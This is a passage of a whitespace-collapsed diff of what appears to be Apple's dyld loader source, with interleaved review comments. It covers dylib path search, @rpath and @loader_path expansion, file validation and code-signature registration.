} + } + } + else if ( !options.staticLinkage && (loadPath[0] != '@') && (loadPath[0] != '/') && (strchr(loadPath, '/') == nullptr) ) { + // handle dlopen("xxx") to mean "@rpath/xxx" when it is already loaded + char implicitRPath[strlen(loadPath)+8]; + strlcpy(implicitRPath, "@rpath/", sizeof(implicitRPath)); + strlcat(implicitRPath, loadPath, sizeof(implicitRPath)); + for ( const Loader* ldr : state.loaded ) { + if ( ldr->matchesPath(implicitRPath) ) { + if ( state.config.log.searching ) + state.log(" found: 
already-loaded-by-rpath: %s\n", ldr->path()); + return ldr; + } + } + } + + // canonicalize shared cache paths + if ( const char* canonicalPathInCache = state.config.canonicalDylibPathInCache(loadPath) ) { + if ( strcmp(canonicalPathInCache, loadPath) != 0 ) { + loadPath = canonicalPathInCache; + if ( state.config.log.searching ) + state.log(" switch to canonical cache path: %s\n", loadPath); + } + } + + // get info about original path + __block uint32_t dylibInCacheIndex; + const bool originalPathIsInDyldCache = state.config.dyldCache.indexOfPath(loadPath, dylibInCacheIndex); + +#if BUILDING_DYLD && TARGET_OS_OSX + // On macOS, we need to support unzippered twins, which look like roots. So if the original path is in the cache, it may + // still be overridable by an unzippered twin which is also in the cache + const bool originalPathIsOverridableInDyldCache = originalPathIsInDyldCache; +#else + const bool originalPathIsOverridableInDyldCache = originalPathIsInDyldCache && state.config.dyldCache.isOverridablePath(loadPath); +#endif + + // search all locations + Loader::forEachPath(diag, state, loadPath, options, + ^(const char* possiblePath, ProcessConfig::PathOverrides::Type type, bool& stop) { + // On customer dyld caches, if loaded a path in cache, don't look for overrides + if ( customerCache && originalPathIsInDyldCache && !originalPathIsOverridableInDyldCache && (possiblePath != loadPath) ) + return; + if ( state.config.log.searching ) + state.log(" possible path(%s): \"%s\"\n", ProcessConfig::PathOverrides::typeName(type), possiblePath); + + // check if this path already in use by a Loader + for ( const Loader* ldr : state.loaded ) { + if ( ldr->matchesPath(possiblePath) ) { + result = ldr; + stop = true; + diag.clearError(); // found dylib, so clear any errors from previous paths tried + if ( state.config.log.searching ) + state.log(" found: already-loaded-by-path: \"%s\"\n", possiblePath); + return; + } + } + + // don't allow file system relative paths in 
hardened programs + // (type == ProcessConfig::PathOverrides::Type::implictRpathExpansion) + if ( !state.config.security.allowEnvVarsPath && isFileRelativePath(possiblePath) ) { + if ( diag.noError() ) + diag.error("tried: '%s' (relative path not allowed in hardened program)", possiblePath); + else + diag.appendError(", '%s' (relative path not allowed in hardened program)", possiblePath); + return; + } + + // check dyld cache trie to see if this is an alias to a cached dylib + uint32_t possibleCacheIndex; + if ( state.config.dyldCache.indexOfPath(possiblePath, possibleCacheIndex) ) { + for ( const Loader* ldr : state.loaded ) { + if ( ldr->representsCachedDylibIndex(possibleCacheIndex) ) { + result = ldr; + stop = true; + diag.clearError(); // found dylib, so clear any errors from previous paths tried + if ( state.config.log.searching ) + state.log(" found: already-loaded-by-dylib-index: \"%s\" -> %s\n", possiblePath, ldr->path()); + return; + } + } + } + + // RTLD_NOLOAD used and this possible path not already in use, so skip to next + if ( options.rtldNoLoad ) { + return; + } + + // Check for PseudoDylibs + if (!state.pseudoDylibs.empty()) { + // FIXME: Should all of this be in its own function? + if ( state.config.log.searching ) + state.log("searching %lu pseudo-dylibs:\n", state.pseudoDylibs.size()); + for (auto &pd : state.pseudoDylibs) { + if (strcmp(pd->getIdentifier(), possiblePath) == 0) { + if ( state.config.log.searching ) + state.log(" found: pseduo-dylib: \"%s\"\n", possiblePath); + Diagnostics possiblePathDiag; + result = makePseudoDylibLoader(possiblePathDiag, state, possiblePath, options, &*pd); + if ( possiblePathDiag.hasError() ) { + // Report error if pseudo-dylib failed to load.
+ if ( diag.noError() ) + diag.error("tried: '%s' (%s)", possiblePath, possiblePathDiag.errorMessageCStr()); + else + diag.appendError(", '%s' (%s)", possiblePath, possiblePathDiag.errorMessageCStr()); + + if ( state.config.log.searching ) + state.log(" found: pseudo-dylib-error: \"%s\" => \"%s\"\n", possiblePath, possiblePathDiag.errorMessageCStr()); + } + if (result) { + diag.clearError(); + stop = true; + return; + } + } + } + if ( state.config.log.searching && !result) + state.log("no pseudo-dylibs matched\n"); + } else if ( state.config.log.searching ) + state.log("no pseudo-dylibs to search\n"); + + // see if this path is on disk or in dyld cache + int possiblePathOnDiskErrNo = 0; + bool possiblePathHasFileOnDisk = false; + bool possiblePathIsInDyldCache = false; + bool possiblePathOverridesCache = false; + FileID possiblePathFileID = FileID::none(); + if ( customerCache ) { + // for customer cache, check cache first and only stat() if overridable + if ( !ProcessConfig::PathOverrides::isOnDiskOnlyType(type) ) + possiblePathIsInDyldCache = state.config.dyldCache.indexOfPath(possiblePath, dylibInCacheIndex); + if ( possiblePathIsInDyldCache ) { + if ( state.config.dyldCache.isOverridablePath(possiblePath) ) { + // see if there is a root installed that overrides one of few overridable dylibs in the cache + possiblePathHasFileOnDisk = state.config.fileExists(possiblePath, &possiblePathFileID, &possiblePathOnDiskErrNo); + possiblePathOverridesCache = possiblePathHasFileOnDisk; + } + } + else { + possiblePathHasFileOnDisk = state.config.fileExists(possiblePath, &possiblePathFileID, &possiblePathOnDiskErrNo); + possiblePathOverridesCache = possiblePathHasFileOnDisk && originalPathIsOverridableInDyldCache; + } + } + else { + // for dev caches, always stat() and check cache + possiblePathHasFileOnDisk = state.config.fileExists(possiblePath, &possiblePathFileID, &possiblePathOnDiskErrNo); + if ( !ProcessConfig::PathOverrides::isOnDiskOnlyType(type) ) + 
possiblePathIsInDyldCache = state.config.dyldCache.indexOfPath(possiblePath, dylibInCacheIndex); + possiblePathOverridesCache = possiblePathHasFileOnDisk && (originalPathIsInDyldCache || possiblePathIsInDyldCache); + } + + // see if this possible path was already loaded via a symlink or hardlink by checking inode + if ( possiblePathHasFileOnDisk && possiblePathFileID.valid() ) { + for ( const Loader* ldr : state.loaded ) { + FileID ldrFileID = ldr->fileID(state); + if ( ldrFileID.valid() && (possiblePathFileID == ldrFileID) ) { + result = ldr; + stop = true; + diag.clearError(); // found dylib, so clear any errors from previous paths tried + if ( state.config.log.searching ) + state.log(" found: already-loaded-by-inode-mtime: \"%s\"\n", ldr->path()); + return; + } + } + } + +#if TARGET_OS_SIMULATOR + // rdar://76406035 (load simulator dylibs from cache) + if ( (state.config.dyldCache.addr != nullptr) && state.config.dyldCache.addr->header.dylibsExpectedOnDisk ) { + if ( const char* simRoot = state.config.pathOverrides.simRootPath() ) { + size_t simRootLen = strlen(simRoot); + // compare inode/mtime of dylib now vs when cache was built + const char* possiblePathInSimDyldCache = nullptr; + if ( strncmp(possiblePath, simRoot, simRootLen) == 0 ) { + // looks like a dylib in the sim Runtime root, see if partial path is in the dyld cache + possiblePathInSimDyldCache = &possiblePath[simRootLen]; + } + else if ( strncmp(possiblePath, "/usr/lib/system/", 16) == 0 ) { + // could be one of the magic host dylibs that got incorporated into the dyld cache + possiblePathInSimDyldCache = possiblePath; + } + if ( possiblePathInSimDyldCache != nullptr ) { + if ( state.config.dyldCache.indexOfPath(possiblePathInSimDyldCache, dylibInCacheIndex) ) { + uint64_t expectedMTime; + uint64_t expectedInode; + state.config.dyldCache.addr->getIndexedImageEntry(dylibInCacheIndex, expectedMTime, expectedInode); + FileID expectedID(expectedInode, state.config.process.dyldSimFSID, expectedMTime, 
true); + if ( possiblePathFileID == expectedID ) { + // inode/mtime matches when sim dyld cache was built, so use dylib from dyld cache and ignore file on disk + possiblePathHasFileOnDisk = false; + possiblePathIsInDyldCache = true; + } + } + } + } + } +#endif + // if possiblePath not a file and not in dyld cache, skip to next possible path + if ( !possiblePathHasFileOnDisk && !possiblePathIsInDyldCache ) { + if ( options.pathNotFoundHandler && !ProcessConfig::PathOverrides::isOnDiskOnlyType(type) ) + options.pathNotFoundHandler(possiblePath); + // append each path tried to diag + if ( diag.noError() ) + diag.error("tried: "); + else + diag.appendError(", "); + const char* sharedCacheMsg = ""; + if ( !ProcessConfig::PathOverrides::isOnDiskOnlyType(type) && mightBeInSharedCache(possiblePath) ) + sharedCacheMsg = (state.config.dyldCache.addr != nullptr) ? ", not in dyld cache" : ", no dyld cache"; + if ( possiblePathOnDiskErrNo == ENOENT ) + diag.appendError("'%s' (no such file%s)", possiblePath, sharedCacheMsg); + else if ( possiblePathOnDiskErrNo == ENOTAFILE_NP ) + diag.appendError("'%s' (not a file%s)", possiblePath, sharedCacheMsg); + else + diag.appendError("'%s' (errno=%d%s)", possiblePath, possiblePathOnDiskErrNo, sharedCacheMsg); + return; + } + + // try to build Loader from possiblePath + Diagnostics possiblePathDiag; + if ( possiblePathHasFileOnDisk ) { + if ( possiblePathOverridesCache ) { + // use dylib on disk to override dyld cache + if ( state.config.log.searching ) + state.log(" found: dylib-from-disk-to-override-cache: \"%s\"\n", possiblePath); + result = makeDiskLoader(possiblePathDiag, state, possiblePath, options, true, dylibInCacheIndex, nullptr); + if ( state.config.log.searching && possiblePathDiag.hasError() ) + state.log(" found: dylib-from-disk-to-override-cache-error: \"%s\" => \"%s\"\n", possiblePath, possiblePathDiag.errorMessageCStr()); + } + else { + // load from disk, nothing to do with dyld cache + if ( state.config.log.searching ) + 
state.log(" found: dylib-from-disk: \"%s\"\n", possiblePath); + result = makeDiskLoader(possiblePathDiag, state, possiblePath, options, false, 0, nullptr); + if ( state.config.log.searching && possiblePathDiag.hasError() ) + state.log(" found: dylib-from-disk-error: \"%s\" => \"%s\"\n", possiblePath, possiblePathDiag.errorMessageCStr()); + } + } + else if ( possiblePathIsInDyldCache ) { + // can use dylib in dyld cache + if ( state.config.log.searching ) + state.log(" found: dylib-from-cache: (0x%04X) \"%s\"\n", dylibInCacheIndex, possiblePath); + result = makeDyldCacheLoader(possiblePathDiag, state, possiblePath, options, dylibInCacheIndex, nullptr); + if ( state.config.log.searching && possiblePathDiag.hasError() ) + state.log(" found: dylib-from-cache-error: \"%s\" => \"%s\"\n", possiblePath, possiblePathDiag.errorMessageCStr()); + } + if ( result != nullptr ) { + stop = true; + diag.clearError(); // found dylib, so clear any errors from previous paths tried + } + else { + // set diag to be contain all errors from all paths tried + if ( diag.noError() ) + diag.error("tried: '%s' (%s)", possiblePath, possiblePathDiag.errorMessageCStr()); + else + diag.appendError(", '%s' (%s)", possiblePath, possiblePathDiag.errorMessageCStr()); + } + }); + + // The last possibility is that the path provided has ../ or // in it, + // or is a symlink to a dylib which is in the cache and no longer on disk. + // Use realpath() and try getLoader() again. 
+ // Do this last and only if it would fail anyways so as to not slow down correct paths + if ( result == nullptr ) { + if ( !state.config.security.allowEnvVarsPath && loadPathIsFileRelativePath ) { + // don't realpath() relative paths in hardened programs + // but do check if path matches install name of something already loaded + for ( const Loader* ldr : state.loaded ) { + if ( ldr->matchesPath(loadPath) ) { + if ( state.config.log.searching ) + state.log(" found existing image by install name: \"%s\"\n", ldr->path()); + result = ldr; + diag.clearError(); + break; + } + } + } + else if ( !options.staticLinkage && (strchr(loadPath, '/') == nullptr) ) { + // don't realpath() leaf names to dlopen(), they have already been handled + } + else { + char canonicalPath[PATH_MAX]; + if ( (loadPath[0] != '@') && state.config.syscall.realpath(loadPath, canonicalPath) ) { + // only call getLoader() again if the realpath is different to prevent recursion + // don't call getLoader() again if the realpath is a just the loadPath cut back, because that means some dir was not found + if ( ::strncmp(loadPath, canonicalPath, strlen(canonicalPath)) != 0 ) { + if ( state.config.log.searching ) + state.log(" switch to realpath: \"%s\"\n", canonicalPath); + result = getLoader(diag, state, canonicalPath, options); + } + } + } + } + + if ( state.config.log.searching && (result == nullptr) ) + state.log(" not found: \"%s\"\n", loadPath); + + // if the load failed due to security policy, leave a hint in dlerror() or crash log messages + if ( (result == nullptr) && (loadPath[0] == '@') && !state.config.security.allowAtPaths ) { + diag.appendError(", (security policy does not allow @ path expansion)"); + } + + // if dylib could not be found, but is not required, clear error message + if ( result == nullptr ) { + if ( (options.canBeMissing || options.rtldNoLoad) ) + diag.clearError(); + else if ( diag.noError() ) { + bool isRPath = (strncmp(loadPath, "@rpath/", 7) == 0); + if ( isRPath ) { + 
// NOTE(review): This chunk is a re-wrapped `git diff` of Apple dyld's Loader.cpp
// (the HEAD mislabels it Header.cpp): '+' diff prefixes are embedded mid-line and
// line breaks fall mid-statement, so the text below is preserved byte-for-byte as
// reference material rather than reformatted. In order it covers: @loader_path /
// @executable_path / @rpath expansion, PrebuiltLoader file validation, segment
// mapping with code-signature registration, and the chained-fixup / kernel
// page-in-linking machinery.
// The first fragment below is the tail of a function that began before this
// chunk: it re-scans the LC_RPATH stack purely to produce a better diagnostic
// ("no LC_RPATH's found") after an @rpath lookup failed.
__block bool hasRPath = false; + for ( const LoadChain* link = options.rpathStack; (link != nullptr) && !hasRPath; link = link->previous ) { + const MachOFile* mf = link->image->mf(state); + mf->forEachRPath(^(const char* rPath, bool& innerStop) { + hasRPath = true; + innerStop = true; + }); + } + if ( !hasRPath ) { + diag.error("no LC_RPATH's found"); + } else { + // FIXME: Is there an error we can give if we can even get here? + } + } else { + // FIXME: Is there an error we can give if we can even get here? + } + } + } + return result; +#endif // !TARGET_OS_EXCLAVEKIT +} + +#if !TARGET_OS_EXCLAVEKIT +bool Loader::expandAtLoaderPath(RuntimeState& state, const char* loadPath, const LoadOptions& options, const Loader* ldr, bool fromLCRPATH, char fixedPath[]) +{ + // only do something if path starts with @loader_path + if ( strncmp(loadPath, "@loader_path", 12) != 0 ) + return false; + if ( (loadPath[12] != '/') && (loadPath[12] != '\0') ) + return false; + + // don't support @loader_path in DYLD_INSERT_LIBRARIES + if ( options.insertedDylib ) { + if ( state.config.log.searching ) + state.log(" @loader_path not allowed in DYLD_INSERT_LIBRARIES\n"); + return false; + } + + // don't expand if security does not allow + if ( !state.config.security.allowAtPaths && fromLCRPATH && (ldr == state.mainExecutableLoader) ) { + // but allow @loader_path in LC_LOAD_DYLIB during dlopen() + if ( state.config.log.searching ) + state.log(" @loader_path in LC_RPATH from main executable not expanded due to security policy\n"); + return false; + } + + strlcpy(fixedPath, ldr->path(), PATH_MAX); + char* lastSlash = strrchr(fixedPath, '/'); + if ( lastSlash != nullptr ) { + strlcpy(lastSlash, &loadPath[12], PATH_MAX); + return true; + } + return false; +} + +bool Loader::expandAndNormalizeAtExecutablePath(const char* mainPath, const char* pathWithAtExecutable, char fixedPath[PATH_MAX]) +{ + // only do something if path starts with "@executable_path/" or is ""@executable_path" + if ( 
// NOTE(review): continuing Loader::expandAndNormalizeAtExecutablePath —
// replaces the "@executable_path" prefix with the main executable's directory
// and folds leading "/.." components by chopping path components off the end of
// the (already real) main-executable path.
strncmp(pathWithAtExecutable, "@executable_path", 16) != 0 ) + return false; + if ( (pathWithAtExecutable[16] != '/') && (pathWithAtExecutable[16] != '\0') ) + return false; + + strlcpy(fixedPath, mainPath, PATH_MAX); + char* mainPathDirStart = strrchr(fixedPath, '/'); + if ( mainPathDirStart == nullptr ) + return false; // no slash in mainPath ?? + + const char* trailingLoadPath = &pathWithAtExecutable[16]; + if ( *trailingLoadPath == '/' ) { + // main executable path is already a real path, so we can remove ../ by chopping back path + // Ex: @executable_path/../Foo (when mainPath=/Applications/XZY.app/XZY) + // optimize /Applications/XZY.app/../Foo to /Applications/Foo + while ( strncmp(trailingLoadPath, "/..", 3) == 0 ) { + char* newLastSlash = mainPathDirStart-1; + while ( (newLastSlash > fixedPath) && (*newLastSlash != '/') ) + --newLastSlash; + if ( newLastSlash != fixedPath ) { + trailingLoadPath += 3; + mainPathDirStart = newLastSlash; + } else { + break; + } + } + } + else { + ++mainPathDirStart; + } + strlcpy(mainPathDirStart, trailingLoadPath, PATH_MAX); + return true; +} + +bool Loader::expandAtExecutablePath(RuntimeState& state, const char* loadPath, const LoadOptions& options, bool fromLCRPATH, char fixedPath[]) +{ + // only do something if path starts with @executable_path + if ( strncmp(loadPath, "@executable_path", 16) != 0 ) + return false; + if ( (loadPath[16] != '/') && (loadPath[16] != '\0') ) + return false; + + // don't expand if security does not allow + if ( !state.config.security.allowAtPaths ) { + if ( state.config.log.searching ) + state.log(" @executable_path not expanded due to security policy\n"); + return false; + } + + return expandAndNormalizeAtExecutablePath(state.config.process.mainExecutablePath, loadPath, fixedPath); +} + +void Loader::forEachResolvedAtPathVar(RuntimeState& state, const char* loadPath, const LoadOptions& options, ProcessConfig::PathOverrides::Type type, bool& stop, + void (^handler)(const char* possiblePath, 
// NOTE(review): continuing Loader::forEachResolvedAtPathVar — expands
// @loader_path, @executable_path and @rpath in `loadPath`, invoking `handler`
// once per candidate path. On macOS (BUILDING_DYLD && TARGET_OS_OSX) it also
// retries @loader_path expansion for old dylibs whose install name omits the
// "/Versions/A" framework component (Malformed::loaderPathsAreReal check).
ProcessConfig::PathOverrides::Type type, bool& stop)) +{ + // don't expand @rpath in DYLD_INSERT_LIBRARIES + bool isRPath = (strncmp(loadPath, "@rpath/", 7) == 0); + if ( isRPath && options.insertedDylib ) { + handler(loadPath, type, stop); + return; + } + + // expand @loader_path + BLOCK_ACCCESSIBLE_ARRAY(char, tempPath, PATH_MAX); + if ( expandAtLoaderPath(state, loadPath, options, options.rpathStack->image, false, tempPath) ) { + handler(tempPath, ProcessConfig::PathOverrides::Type::loaderPathExpansion, stop); +#if BUILDING_DYLD && TARGET_OS_OSX + if ( !stop ) { + // using @loader_path, but what it expanded to did not work ('stop' not set) + // maybe this is an old binary with an install name missing the /Versions/A/ part + const Loader* orgLoader = options.rpathStack->image; + const MachOAnalyzer* orgMA = orgLoader->analyzer(state); + if ( orgMA->isDylib() && !orgMA->enforceFormat(MachOAnalyzer::Malformed::loaderPathsAreReal) ) { + const char* fullPath = orgLoader->path(); + const char* installPath = orgMA->installName(); + if ( const char* installLeaf = strrchr(installPath, '/') ) { + size_t leafLen = strlen(installLeaf); + size_t fullLen = strlen(fullPath); + if ( fullLen > (leafLen+11) ) { + const char* fullWhereVersionMayBe = &fullPath[fullLen-leafLen-11]; + if ( strncmp(fullWhereVersionMayBe, "/Versions/", 10) == 0 ) { + // try expanding @loader_path to this framework's path that is missing /Versions/A part + strlcpy(tempPath, fullPath, PATH_MAX); + tempPath[fullLen-leafLen-11] = '\0'; + strlcat(tempPath, &loadPath[12], PATH_MAX); + handler(tempPath, ProcessConfig::PathOverrides::Type::loaderPathExpansion, stop); + } + } + } + } + } +#endif + return; + } + + // expand @executable_path + if ( expandAtExecutablePath(state, loadPath, options, false, tempPath) ) { + handler(tempPath, ProcessConfig::PathOverrides::Type::executablePathExpansion, stop); + return; + } + + // expand @rpath + if ( isRPath ) { + // note: rpathTail starts with '/' + const char* 
// NOTE(review): @rpath expansion — walks options.rpathStack (LC_RPATH entries
// pushed from the main executable down through each recursively loaded image)
// and substitutes the tail after "@rpath" into each candidate directory; each
// LC_RPATH may itself begin with @loader_path/@executable_path.
rpathTail = &loadPath[6]; + // keep track if this is an explict @rpath or implicit + ProcessConfig::PathOverrides::Type expandType = ProcessConfig::PathOverrides::Type::rpathExpansion; + if ( type == ProcessConfig::PathOverrides::Type::implictRpathExpansion ) + expandType = type; + // rpath is expansion is a stack of rpath dirs built starting with main executable and pushing + // LC_RPATHS from each dylib as they are recursively loaded. options.rpathStack is a linnked list of that stack. + for ( const LoadChain* link = options.rpathStack; (link != nullptr) && !stop; link = link->previous ) { + const MachOFile* mf = link->image->mf(state); + mf->forEachRPath(^(const char* rPath, bool& innerStop) { + if ( state.config.log.searching ) + state.log(" LC_RPATH '%s' from '%s'\n", rPath, link->image->path()); + if ( expandAtLoaderPath(state, rPath, options, link->image, true, tempPath) || expandAtExecutablePath(state, rPath, options, true, tempPath) ) { + Utils::concatenatePaths(tempPath, rpathTail, PATH_MAX); + handler(tempPath, expandType, innerStop); + } + else if ( rPath[0] == '/' ) { +#if BUILDING_DYLD && TARGET_OS_OSX && __arm64__ // FIXME: this should be a runtime check to enable unit testing + // if LC_RPATH is to absolute path like /usr/lib/swift, but this iOS app running on macOS, we really need /System/iOSSupport/usr/lib/swift + if ( state.config.process.platform == dyld3::Platform::iOS ) { + strlcpy(tempPath, "/System/iOSSupport", PATH_MAX); + strlcat(tempPath, rPath, PATH_MAX); + Utils::concatenatePaths(tempPath, rpathTail, PATH_MAX); + handler(tempPath, expandType, innerStop); + if ( innerStop ) { + stop = true; + return; + } + } + // fall through +#endif +#if TARGET_OS_SIMULATOR + // DYLD_ROOT_PATH should apply to LC_RPATH rpaths + if ( const char* simRoot = state.config.pathOverrides.simRootPath() ) { + strlcpy(tempPath, simRoot, PATH_MAX); + strlcat(tempPath, rPath, PATH_MAX); + Utils::concatenatePaths(tempPath, rpathTail, PATH_MAX); + handler(tempPath, 
// NOTE(review): absolute LC_RPATH handling continues — on simulator the
// DYLD_ROOT_PATH prefix is tried first, then the raw path, then the cryptex
// root (ordering per rdar://91027811, cited below in the code).
expandType, innerStop); + if ( innerStop ) { + stop = true; + return; + } + } + // Even if DYLD_ROOT_PATH exists, LC_RPATH should add raw path to rpaths + // so fall through +#endif + + // LC_RPATH is an absolute path, not blocked by AtPath::none + strlcpy(tempPath, rPath, PATH_MAX); + Utils::concatenatePaths(tempPath, rpathTail, PATH_MAX); + handler(tempPath, expandType, innerStop); + if ( innerStop ) { + stop = true; + return; + } + + // Note this is after the above call due to: + // rdar://91027811 (dyld should search for dylib overrides in / before /System/Cryptexes/OS) + // DYLD_ROOT_PATH should apply to LC_RPATH rpaths + if ( const char* cryptexRoot = state.config.pathOverrides.cryptexRootPath() ) { + strlcpy(tempPath, cryptexRoot, PATH_MAX); + strlcat(tempPath, rPath, PATH_MAX); + Utils::concatenatePaths(tempPath, rpathTail, PATH_MAX); + handler(tempPath, expandType, innerStop); + if ( innerStop ) { + stop = true; + return; + } + } + } else { +#if BUILDING_DYLD && TARGET_OS_OSX // FIXME: this should be a runtime check to enable unit testing + // + // Relative paths. 
// NOTE(review): relative LC_RPATH entries (not starting with '/', not
// @-prefixed) are only honored when security.allowAtPaths permits.
Only allow these if security supports them + if ( state.config.security.allowAtPaths ) { + strlcpy(tempPath, rPath, PATH_MAX); + Utils::concatenatePaths(tempPath, rpathTail, PATH_MAX); + handler(tempPath, expandType, innerStop); + } +#endif + } + if ( innerStop ) + stop = true; + }); + } + if ( stop ) + return; + } + + // only call with origin path if it did not start with @ + if ( loadPath[0] != '@' ) { + handler(loadPath, type, stop); + } +} +#endif // !TARGET_OS_EXCLAVEKIT + + +#if (BUILDING_DYLD || BUILDING_CLOSURE_UTIL || BUILDING_UNIT_TESTS) && !TARGET_OS_EXCLAVEKIT +uint64_t Loader::validateFile(Diagnostics& diag, const RuntimeState& state, int fd, const char* path, + const CodeSignatureInFile& codeSignature, const Loader::FileValidationInfo& fileValidation) +{ + // get file info + struct stat statBuf; + if ( state.config.syscall.fstat(fd, &statBuf) != 0 ) { + int statErr = errno; + if ( (statErr == EPERM) && state.config.syscall.sandboxBlockedStat(path) ) + diag.error("file system sandbox blocked stat(\"%s\")", path); + else if ( statErr == ENOENT ) + diag.error("no such file"); + else + diag.error("stat(\"%s\") failed with errno=%d", path, statErr); + return -1; + } + +#if !__LP64__ + statBuf.st_ino = (statBuf.st_ino & 0xFFFFFFFF); +#endif + + // if inode/mtime was recorded, check that + if ( fileValidation.checkInodeMtime ) { + if ( statBuf.st_ino != fileValidation.inode ) { + diag.error("file inode changed from 0x%llX to 0x%llX since PrebuiltLoader was built for '%s'", fileValidation.inode, statBuf.st_ino, path); + return -1; + } + if ( (uint64_t)statBuf.st_mtime != fileValidation.mtime ) { + diag.error("file mtime changed from 0x%llX to 0x%lX since PrebuiltLoader was built for '%s'", fileValidation.mtime, statBuf.st_mtime, path); + return -1; + } + // sanity check slice offset + if ( (uint64_t)statBuf.st_size < fileValidation.sliceOffset ) { + diag.error("file too small for slice offset '%s'", path); + return -1; + } + return fileValidation.sliceOffset; 
// NOTE(review): continuing Loader::validateFile — when inode/mtime was not
// recorded, the else-branch maps the file and compares its code-directory hash
// (cdHash) against the value captured when the PrebuiltLoader was built;
// returns the slice offset on success, -1 (with diag set) otherwise.
// NOTE(review): the munmap below passes fileValidation.sliceOffset as the
// length even though the mmap used statBuf.st_size — looks like a size
// mismatch; verify against current upstream dyld before relying on it.
+ } + else if ( codeSignature.size != 0 ) { +#if !TARGET_OS_SIMULATOR // some hashing functions not available in .a files + // otherwise compare cdHash + void* mappedFile = state.config.syscall.mmap(nullptr, (size_t)statBuf.st_size, PROT_READ, MAP_PRIVATE, fd, 0); + if ( mappedFile == MAP_FAILED ) { + diag.error("could not mmap() '%s'", path); + return -1; + } + uint64_t sliceOffset = -1; + bool isOSBinary = false; // FIXME + if ( const MachOFile* mf = MachOFile::compatibleSlice(diag, mappedFile, (size_t)statBuf.st_size, path, state.config.process.platform, isOSBinary, *state.config.process.archs, state.config.security.internalInstall) ) { + const MachOLoaded* ml = (MachOLoaded*)mf; + __block bool cdHashMatches = false; + // Note, file is not mapped with zero fill so cannot use forEachCdHash() + // need to use lower level forEachCDHashOfCodeSignature() which takes pointer to code blob + ml->forEachCDHashOfCodeSignature((uint8_t*)mf + codeSignature.fileOffset, codeSignature.size, ^(const uint8_t cdHash[20]) { + if ( ::memcmp((void*)cdHash, (void*)fileValidation.cdHash, 20) == 0 ) + cdHashMatches = true; + }); + if ( cdHashMatches ) + sliceOffset = (uint8_t*)mf - (uint8_t*)mappedFile; + else + diag.error("file cdHash not as expected '%s'", path); + } + state.config.syscall.munmap(mappedFile, (size_t)fileValidation.sliceOffset); + return sliceOffset; +#endif + } + return -1; +} + +#if BUILDING_DYLD +static bool getUuidFromFd(RuntimeState& state, int fd, uint64_t sliceOffset, char uuidStr[64]) +{ + strlcpy(uuidStr, "no uuid", 64); + mach_header mh; + if ( state.config.syscall.pread(fd, &mh, sizeof(mh), (size_t)sliceOffset) == sizeof(mh) ) { + if ( ((MachOFile*)&mh)->hasMachOMagic() ) { + size_t headerAndLoadCommandsSize = mh.sizeofcmds+sizeof(mach_header_64); + uint8_t buffer[headerAndLoadCommandsSize]; + if ( state.config.syscall.pread(fd, buffer, sizeof(buffer), (size_t)sliceOffset) == headerAndLoadCommandsSize ) { + uuid_t uuid; + if ( 
// NOTE(review): tail of getUuidFromFd — best-effort read of the mach-o UUID at
// `sliceOffset` for diagnostics; on any failure the caller is left with the
// literal "no uuid" string installed above.
((MachOFile*)buffer)->getUuid(uuid) ) { + Loader::uuidToStr(uuid, uuidStr); + return true; + } + } + } + } + return false; +} +#endif + +const MachOAnalyzer* Loader::mapSegments(Diagnostics& diag, RuntimeState& state, const char* path, uint64_t vmSpace, + const CodeSignatureInFile& codeSignature, bool hasCodeSignature, + const Array& regions, bool neverUnloads, bool prebuilt, const FileValidationInfo& fileValidation) +{ +#if BUILDING_DYLD + dyld3::ScopedTimer timer(DBG_DYLD_TIMING_MAP_IMAGE, path, 0, 0); +#endif + // open file + int fd = state.config.syscall.open(path, O_RDONLY, 0); + if ( fd == -1 ) { + int openErr = errno; + if ( (openErr == EPERM) && state.config.syscall.sandboxBlockedOpen(path) ) + diag.error("file system sandbox blocked open(\"%s\", O_RDONLY)", path); + else if ( openErr == ENOENT ) + diag.error("no such file"); + else + diag.error("open(\"%s\", O_RDONLY) failed with errno=%d", path, openErr); + return nullptr; + } + + // validated this file has not changed (since PrebuiltLoader was made) + uint64_t sliceOffset = fileValidation.sliceOffset; + if ( prebuilt ) { + sliceOffset = validateFile(diag, state, fd, path, codeSignature, fileValidation); + if ( diag.hasError() ) { + state.config.syscall.close(fd); + return nullptr; + } + } + +#if BUILDING_DYLD + // register code signature + uint64_t coveredCodeLength = UINT64_MAX; + if ( hasCodeSignature && codeSignature.size != 0 ) { + dyld3::ScopedTimer codeSigTimer(DBG_DYLD_TIMING_ATTACH_CODESIGNATURE, 0, 0, 0); + fsignatures_t siginfo; + siginfo.fs_file_start = sliceOffset; // start of mach-o slice in fat file + siginfo.fs_blob_start = (void*)(long)(codeSignature.fileOffset); // start of CD in mach-o file + siginfo.fs_blob_size = codeSignature.size; // size of CD + int result = state.config.syscall.fcntl(fd, F_ADDFILESIGS_RETURN, &siginfo); + if ( result == -1 ) { + char uuidStr[64]; + getUuidFromFd(state, fd, sliceOffset, uuidStr); + int errnoCopy = errno; + if ( (errnoCopy == EPERM) || (errnoCopy == 
// NOTE(review): continuing Loader::mapSegments — code-signature registration
// via fcntl(F_ADDFILESIGS_RETURN); EPERM/EBADEXEC are reported as an invalid
// signature, anything else as a generic fcntl failure, and the kernel-returned
// fs_file_start is checked to cover the file up to the signature blob.
EBADEXEC) ) { + diag.error("code signature invalid in <%s> '%s' (errno=%d) sliceOffset=0x%08llX, codeBlobOffset=0x%08X, codeBlobSize=0x%08X", + uuidStr, path, errnoCopy, sliceOffset, codeSignature.fileOffset, codeSignature.size); + } + else { + diag.error("fcntl(fd, F_ADDFILESIGS_RETURN) failed with errno=%d in <%s> '%s', sliceOffset=0x%08llX, codeBlobOffset=0x%08X, codeBlobSize=0x%08X", + errnoCopy, uuidStr, path, sliceOffset, codeSignature.fileOffset, codeSignature.size); + } + state.config.syscall.close(fd); + return nullptr; + } + coveredCodeLength = siginfo.fs_file_start; + if ( coveredCodeLength < codeSignature.fileOffset ) { + char uuidStr[64]; + getUuidFromFd(state, fd, sliceOffset, uuidStr); + diag.error("code signature does not cover entire file up to signature in <%s> '%s' (signed 0x%08llX, expected 0x%08X) for '%s'", + uuidStr, path, coveredCodeLength, codeSignature.fileOffset, path); + state.config.syscall.close(fd); + return nullptr; + } + } + + // dyld should use F_CHECK_LV even on unsigned binaries + { + // always call F_CHECK_LV to preflight + fchecklv checkInfo; + char messageBuffer[512]; + messageBuffer[0] = '\0'; + checkInfo.lv_file_start = sliceOffset; + checkInfo.lv_error_message_size = sizeof(messageBuffer); + checkInfo.lv_error_message = messageBuffer; + int res = state.config.syscall.fcntl(fd, F_CHECK_LV, 